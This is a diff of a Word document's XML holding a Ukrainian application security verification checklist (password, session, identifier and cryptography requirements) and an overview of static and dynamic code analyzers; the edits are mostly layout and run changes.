+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13865,6 +14122,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>2.11</w:t>
             </w:r>
           </w:p>
@@ -14053,7 +14311,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>2.12</w:t>
             </w:r>
           </w:p>
@@ -15198,6 +15455,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Переконайтеся в тому, що перевірений додаток задовольняє наступні вимоги управління сеансами високого рівня:</w:t>
       </w:r>
     </w:p>
@@ -15363,7 +15621,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>#</w:t>
             </w:r>
           </w:p>
@@ -17180,7 +17437,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">ідентифікатори, які генеруються </w:t>
+              <w:t xml:space="preserve">ідентифікатори, які </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">генеруються </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17340,6 +17608,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>3.9</w:t>
             </w:r>
           </w:p>
@@ -17577,7 +17846,6 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>V</w:t>
       </w:r>
       <w:r>
@@ -19981,6 +20249,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>4.8</w:t>
             </w:r>
           </w:p>
@@ -20292,18 +20561,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">, особливо якщо </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">фреймворк не </w:t>
+              <w:t xml:space="preserve">, особливо якщо фреймворк не </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -20501,7 +20759,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>4.10</w:t>
             </w:r>
           </w:p>
@@ -21701,8 +21958,6 @@
         </w:rPr>
         <w:t>Вимоги до криптографії та шифування</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -22032,7 +22287,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що всі випадкові числа, випадкові імена файлів, випадковий </w:t>
+              <w:t xml:space="preserve">Переконайтеся, що всі випадкові числа, випадкові імена </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">файлів, випадковий </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -22230,6 +22496,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>5.2</w:t>
             </w:r>
           </w:p>
@@ -22275,18 +22542,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що криптографічні алгоритми, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">використовувані додатком були перевірені </w:t>
+              <w:t xml:space="preserve">Переконайтеся, що криптографічні алгоритми, використовувані додатком були перевірені </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -22376,7 +22632,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:sym w:font="Wingdings" w:char="F0FC"/>
             </w:r>
           </w:p>
@@ -22460,7 +22715,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>5.3</w:t>
             </w:r>
           </w:p>
@@ -23886,6 +24140,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -23906,9 +24161,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -23916,10 +24170,10 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>кодах</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -23928,7 +24182,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
+        <w:t xml:space="preserve"> модулів, призначених для розширення функціональності корпоративних і виробничих систем. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23942,6 +24196,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24050,18 +24305,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+        <w:t>ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -24114,7 +24358,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+        <w:t xml:space="preserve">. В </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -24158,7 +24413,519 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
+        <w:t xml:space="preserve">ізних регуляторів. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Принципи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>роботи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>аналізаторів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вихідного</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Загальні</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>принципи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>роботи</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>схожі</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>всіх</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>класів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>аналізаторів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>аналізаторів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вихідного</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>веб</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>додатків</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>аналізаторів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
